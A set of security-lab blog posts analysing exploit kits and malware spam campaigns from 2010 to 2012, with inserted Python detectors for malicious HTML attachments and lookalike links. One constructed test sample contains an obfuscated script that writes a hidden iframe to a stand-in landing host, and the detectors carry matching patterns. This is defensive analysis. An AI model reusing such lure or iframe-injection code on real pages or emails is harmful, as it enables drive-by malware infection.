Posts Tagged ‘Exploit Kits’

Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez  •  February 16th, 2012  •   Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened the message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, its default settings fortunately prevented the malicious JavaScript in the HTML source from running. The Thunderbird user needs to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example from a more recent spam campaign. This particular message claims to be an invoice from a random company, with an attached .HTM file pretending to be the invoice. Here, the sample spam was opened using Microsoft Outlook, and the attachment just shows the icon of the system’s default browser. Again, for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.

So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second, malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window. But this is not an ordinary webpage; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugins. On our test machine, the landing page successfully exploited our browser’s default PDF reader with the Libtiff integer overflow vulnerability in Adobe Reader. The exploit ended up downloading and installing malware on our test computer, which, at the time of writing, was a data-stealing Trojan with the antivirus detection name Cridex.
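As an added illustration (not code from the original post), here is a small Python checker for the attachment pattern just described: it walks an email’s .htm/.html attachments and flags a script that writes a hidden iframe, including one assembled from unescape() percent-encoding. The indicator patterns, the .invalid hostnames and the sample message are this example’s own assumptions.

```python
import re
from email import message_from_bytes
from email.message import EmailMessage
from urllib.parse import unquote

# Indicators for the attachment pattern described above: a script that writes a
# (hidden) iframe, usually wrapped in unescape()/fromCharCode()/eval().
# These patterns are this example's own heuristics, not a vendor signature.
INDICATORS = {
    "writes_iframe": re.compile(r"document\.write\s*\([^;]{0,400}<\s*iframe", re.I),
    "decoder_call": re.compile(r"\b(unescape|String\.fromCharCode|eval)\s*\(", re.I),
    "hidden_frame": re.compile(r"<iframe[^>]*\b(width|height)\s*=\s*[\"']?0\b", re.I),
    "meta_refresh": re.compile(r"http-equiv\s*=\s*[\"']?refresh", re.I),
}


def scan_html(html_text):
    """Return the sorted names of the indicators found in one HTML document."""
    # Search a percent-decoded copy too, so an iframe assembled from
    # unescape('%3Ciframe ...') is seen in the clear as well as encoded.
    haystack = html_text + "\n" + unquote(html_text)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))


def scan_message(raw_message):
    """Scan every .htm/.html attachment of an RFC 822 message.

    Returns {attachment filename: [matched indicator names]}.
    """
    results = {}
    for part in message_from_bytes(raw_message).walk():
        name = part.get_filename() or ""
        if name.lower().endswith((".htm", ".html")):
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            results[name] = scan_html(body)
    return results


def build_sample_message():
    """Constructed sample mimicking the 'Please wait... Loading' invoice lure."""
    payload = ("<html><head><title>You are redirecting...</title></head>\n"
               "<body>Please wait... Loading....\n"
               "<script>document.write(unescape('%3Ciframe src=%22http://"
               "landing.invalid/in.php%22 width=0 height=0%3E%3C/iframe%3E'));"
               "</script></body></html>\n")
    msg = EmailMessage()
    msg["Subject"] = "Invoice 2012-0216"
    msg["From"] = "billing@sender.invalid"
    msg["To"] = "user@recipient.invalid"
    msg.set_content("Please find your invoice attached.")
    msg.add_attachment(payload, subtype="html", filename="Invoice.htm")
    return msg.as_bytes()
```

Running `scan_message(build_sample_message())` reports the attachment with the decoder, hidden-frame and iframe-write indicators; a plain HTML document with no script yields an empty list.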

The landing page that contains the exploit code belongs to a kit used by cybercriminals for this particular spam campaign, the Phoenix Exploit kit. This exploit kit is readily available for cybercriminals to buy and use; all they need is their own web server that can run PHP scripts. The image shown below is a screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—” referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.

Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.

Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing; it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues that it is fake: the message doesn’t contain any profile photos, and the recipient’s email address has been omitted from the fine print at the bottom.

By contrast, here is a legitimate Facebook friend request.

Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update, where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilities on your system, notably in Java.

The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.

Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik  •  June 4th, 2011  •   Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time, it was not really usable, as it required activation by the author of the exploit kit: it contains an activation page that is used to load all the exploits onto the server for each specific customer. As expected, the author of the exploit kit released a new version of the tool, version 2.7.

Phoenix Exploit’s Kit 2.7 logo

The changes between the two versions are minor, but still very important, as most exploits become ineffective in the very short term, especially with the latest IE vulnerabilities.

Malicious LinkedIn Campaign

By Phil Hay  •  June 3rd, 2011  •   Malware

We are currently seeing a malicious spam campaign purporting to be a notification from LinkedIn. The messages look realistic, but the giveaway is the bogus link exposed when you hover over the confirm button.

The bogus link salesforceappi[dot]com leads off to a server hosting an exploit kit, which automatically attempts to load malware onto the victim’s computer by using one of a number of ‘canned’ exploits targeting known vulnerabilities.

The campaign is very similar to one we saw last September, also using LinkedIn and also leading to an Exploit Kit. Real notifications from these sorts of social networking sites are commonplace and the bad guys are preying on this. Remember, just because it looks legit, doesn’t mean it is.
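The giveaway in both the fake Facebook invite above and this LinkedIn notification is the same: the copied template names the real brand, while the button’s href points somewhere else. The following Python example (added here, not the post’s own code) extracts every link from an HTML notification and reports those that leave the brand’s domains, treating a host that merely contains the brand name as a lookalike; the allowed-domain list, the .invalid hosts and the sample message are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class LinkCollector(HTMLParser):
    """Collect (visible text, href) for every <a> element, in document order."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((" ".join("".join(self._text).split()), self._href))
            self._href = None


def host_belongs(host, allowed_domains):
    """True if host is one of the allowed domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed_domains)


def suspicious_links(html_body, brand, allowed_domains):
    """Return (text, href, reason) for each link that leaves the brand's domains."""
    collector = LinkCollector()
    collector.feed(html_body)
    findings = []
    for text, href in collector.links:
        host = urlsplit(href).hostname or ""
        if not host or host_belongs(host, allowed_domains):
            continue  # mailto:/fragment links, or a genuine destination
        # A host that only *contains* the brand name is the classic lookalike.
        reason = "lookalike host" if brand.lower() in host.lower() else "foreign host"
        findings.append((text, href, reason))
    return findings


# Constructed sample in the style of the lure described above: the template
# text names the real brand, but the confirm button's href does not.
SAMPLE_LURE = """<html><body><p>Jane Doe wants to connect with you on LinkedIn.</p>
<a href="http://invites.lure-host.invalid/confirm?id=1">Confirm that you know Jane</a>
<p style="font-size:10px">&copy; 2011 LinkedIn Corporation.
<a href="http://www.linkedin.com/">LinkedIn</a> |
<a href="http://linkedin-mail.invalid/unsub">Unsubscribe</a></p></body></html>"""
```

`suspicious_links(SAMPLE_LURE, "LinkedIn", ["linkedin.com"])` flags the confirm button as a foreign host and the unsubscribe link as a lookalike, while the genuine www.linkedin.com footer link passes.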

Update: 7 June

After some investigation, we identified the exploit kit as the Blackhole kit, and managed to gain access to its control panel. Below is an interesting statistics page that shows:

  • Successful malware ‘loads’ at 17.55%
  • Successful loads against most browsers, with Internet Explorer at the top with 28.25% of loads
  • Successful loads on a range of operating systems
  • Java exploits account for 80% of successful loads, and PDF exploits account for a further 12%.

The moral of the story is to keep your software updated, impeccably, at all times.  Particularly Java and PDF readers.

Thanks to Daniel Chechik who assisted with details on the Blackhole Exploit kit.

k0desploit Exploit Kit and Stolen Credit Cards Discovered

By Avri Schneider  •  March 9th, 2011  •   Cybercrime

During our investigative research into existing and emerging threats, we tend to make new discoveries. One of the most recent cases involved the discovery of a new toolkit:

k0de Sploit Pack

The phrase at the bottom of the page (“K0de.org Open Source Exploits”) caught our attention, as we wondered how ‘open-source’ this toolkit really was. A quick Google search led us to the third result:

Leaked Message from Exploit Kit Author

The post (or ‘paste’, to use Pastie.org’s terminology) contained a leaked message written by the toolkit author on a private hacker forum. It reveals that this new toolkit is just a clone of the popular Eleonore kit with various improvements:

“As you can see it’s pretty much elenores lay out with a few touch ups & very badly made paint buttons. I’ve only been working on this for 2 hours or so, so please keep that in mind and I plan to add a lot more onto it in the coming days, so keep an eye out for news.”

The author was nice enough to provide us with interesting statistics from his own research:

“Now then, I’ve tested this on 1,000 unique hits from windows PC’s only (Xp, Vista & Win7 only) and I achieved 96 infections from it, that means the rough infection rate is at 9.6%, that is a 3.5% rise from the great Elenore mod posted by Blackdevil. Most of the infections was from MDAC & the IE kit.”

The author then calls upon fellow malware authors for their help with updating the exploits to ‘fix’ the rise in detection rate of the malicious iframe. Also, the author lists some of the modifications he has made in this toolkit:

“Since I have tested it, the detection of the iframe has risen a lot, so in order to conduct a good test, someone will have to UD the exploits again.

I have also slightly fixed up the chrome & firefox exploits, I’m not 100% sure but they seem to be hitting at least, whereas they used to do nothing.”

In addition to the “open-source” exploit kit, the page contains a long list of anonymous proxy servers near the bottom as well as stolen credit card numbers along with the login credentials of dozens of individuals.

Here’s a screen-shot of what it looked like:

Screenshot of Stolen Credentials including CC#'s

We have confirmed that, after our notification and prior to publishing this blog post, both Google and pastie.org removed the illegal content.

Siberia Exploits Kit Fights Back Against AV Companies

By Daniel Chechik  •  November 30th, 2010  •   Cybercrime

Siberia Exploit Kit is an evolving crimeware that was first seen in the wild in late 2009. A few months ago the author of Siberia Exploits Kit deployed an upgraded version of the toolkit, as written in the Malware Intelligence Blog.

Login panel of Siberia Exploit’s Kit

As in our last post about Phoenix Exploit’s Kit, the Siberia Exploit’s Kit author also emphasizes circumventing detection by Anti-Virus and URL filtering services: the kit contains a built-in Anti-Virus checker.

Anti-Virus Detection rate of each malware

The administrator of the toolkit can perform an Anti-Virus scan of the malware and exploit pages. Moreover, the scan results from each Anti-Virus company are viewable.

Advanced information of the malware detection among the Anti-Viruses companies

It is well known that once malware is uploaded to the VirusTotal service, the Anti-Virus companies can re-analyze the suspicious files. As such, it’s a good guess that Siberia Exploit’s Kit doesn’t use VirusTotal. In this particular case, the files are sent to an underground Anti-Virus checker called “scan4you.biz”.

The code that accesses the scan4you.biz AV checker (taken from Siberia Exploit’s Kit)

Let’s take a look at our anonymous Anti-Virus checker:

After logging in, the user can upload files and submit URLs for Anti-Virus and URL filtering checks

Of course, this service is not free. The cost is 0.15¢ for every file checked or $25 for a one-month license. The website offers several scans:

  • File scan – Regular Anti-Virus scan
  • URL scan – Anti-Virus scan of URL
  • Blacklist / Filter scan – Check detection of URL in URL filtering services
  • Exploit Pack scan – Check detection of toolkit name in URL filtering services

Finally, so that the service can be integrated into Siberia Exploit’s Kit or any other toolkit, the underground Anti-Virus checking service publishes an API for remote scanning:

Snippet code of the API service provided by scan4you.biz website.

Like other evasion techniques we have seen lately, such as “Anti Wepawet” or “Anti JSunpack” as described in our security labs report, it appears the cybercriminals keep trying to find creative techniques to avoid malware detection at multiple layers — this time by performing an Anti-Virus scan.

Don’t Get Infected By Zombies

By Gavin Neale  •  October 15th, 2010  •   Vulnerabilities

Today we had a peek inside an exploit kit known as the Zombie Infection Kit. This kit is not as widely used as some of the more popular kits such as Eleonore and Phoenix and compared to these other kits, Zombie is not really that sophisticated. However it does carry the usual range of exploits that have been effectively used in many other exploit tool kits. Potential victims are forced to visit Zombie’s exploit page when their browser loads an IFrame placed on a compromised website. All of the vulnerabilities exploited by this kit have been patched by the vendors concerned.

As well as exploiting an old vulnerability in IE 6 and the recent Windows help center vulnerability, the Zombie Infection Kit also uses exploits targeting two Java vulnerabilities, four vulnerabilities in Adobe PDF readers and two vulnerabilities in Adobe Flash.

Success rates for the various exploits used by the Zombie Infection Kit

According to the exploit statistics page in the admin control panel, the two most successful vulnerabilities are in Oracle’s Java, accounting for just over 60 percent of successful infections between them. Following closely behind the Java vulnerabilities is ‘PDF’ which is actually a PDF file containing exploits for four Adobe PDF vulnerabilities; the most recent of which (CVE-2009-4324) has been patched since December 2009.

Another stats page shows a breakdown of victims by browser type, showing the percentage of successful installs for each browser.

Victim browser statistics. The last column is the percentage of successfully infected victims.

This table isn’t really indicative of how secure each browser is, as only Internet Explorer is targeted for browser specific vulnerabilities whereas all browsers are used to target vulnerabilities in Adobe Flash and PDF readers, and Java.

What this does show is that 15 percent (15.39 in the top row of the browser stats image, above) of ‘visitors’ were successfully exploited by the Zombie Infection Kit and made to download a malicious executable. Because Java vulnerabilities accounted for 60 percent of infections, a surprising nine percent of all visitors were infected just by having an old version of java installed.

Java exploits are becoming increasingly useful for web attackers, as many people don’t even know that Java is installed on their machines, or that it may need to be updated. What is worse is that it is possible to have multiple versions of Java installed on a machine so you can still be vulnerable even after you install the latest version, giving you a false sense of security.

We strongly recommend users uninstall Java if they don’t use it, or remove old versions and upgrade to the latest version just released by Oracle which fixes 29 flaws in the previous version for which exploits have recently been published.

Statement About Infection of Macs by ZeuS

By Bradley Anstis  •  August 13th, 2010  •   Reports

In recent press coverage several industry publications and blogs stated that between 3,000 – 4,000 Mac OS machines had been infected with the latest ZeuS Trojan. We believe that this is an incorrect interpretation of Figure 3 from our recent M86 Security Labs report.

Figure 11, Admin Panel of Eleonore Exploit Kit
Figure 3: Stats from the Eleonore Exploit Kit Administrative Panel

Figure 3 does not show the number of infected computers. It is a screen shot of an exploit kit console that shows the number of times that the malicious page had been requested and identifies those visits by the type of operating system of the visitor’s computer. In this case, it shows that the exploit kit’s page was served to as many as 300,000 users of which 3,851 visits were from computers running Mac OS.

Customers of Global Financial Institution Hit by Cybercrime

By Bradley Anstis  •  August 10th, 2010  •   Reports

Today, we released a report of an attack targeting the UK customers of a global financial institution. This attack has been on-going since early July, and our research has discovered that approximately 3000 customers of this financial institution have fallen victim to it. We’ve estimated that close to £675,000 GBP (over $1 Million USD) has been stolen from customer accounts.

The M86 Security Labs team detected this illegal operation after discovering a malicious code attack used to infect users’ PCs with a Trojan. The team then followed the trail to a Command & Control center. The research reveals that the cybercriminals used a combination of exploit kits, the new Zeus v3 Trojan, and money mule accounts to compromise user systems, successfully avoid anti-fraud systems, and rob bank accounts. The whole operation shows a high degree of technical sophistication and complexity, and highlights the continuing and escalating battle we have with cybercrime.

Our report exposes the architecture, business model, tools and methods used by the cybercriminal operation behind this attack. You can download a copy of the report here.

The image below illustrates one of the cybercriminal’s admin panels, showing financial transactions from compromised accounts sent to money mule accounts.

Admin panel showing financial transactions from compromised accounts sent to Money Mule accounts

M86 Security representatives have informed relevant law enforcement agencies of all criminal activities and methods used by the perpetrators of this attack.

Phoenix Exploit Kit 2.0

By Daniel Chechik  •  August 1st, 2010  •   Cybercrime

Phoenix Exploit’s Kit 2.0 is an upgraded version of the Phoenix Toolkit, which was initially researched by M86 Security Labs in mid-2009.

The GUI of the admin panel has not changed significantly from the previous version, but in addition to new features and exploits, a new obfuscation technique has been employed.


Figure 1: The login panel of Phoenix Exploit’s Kit
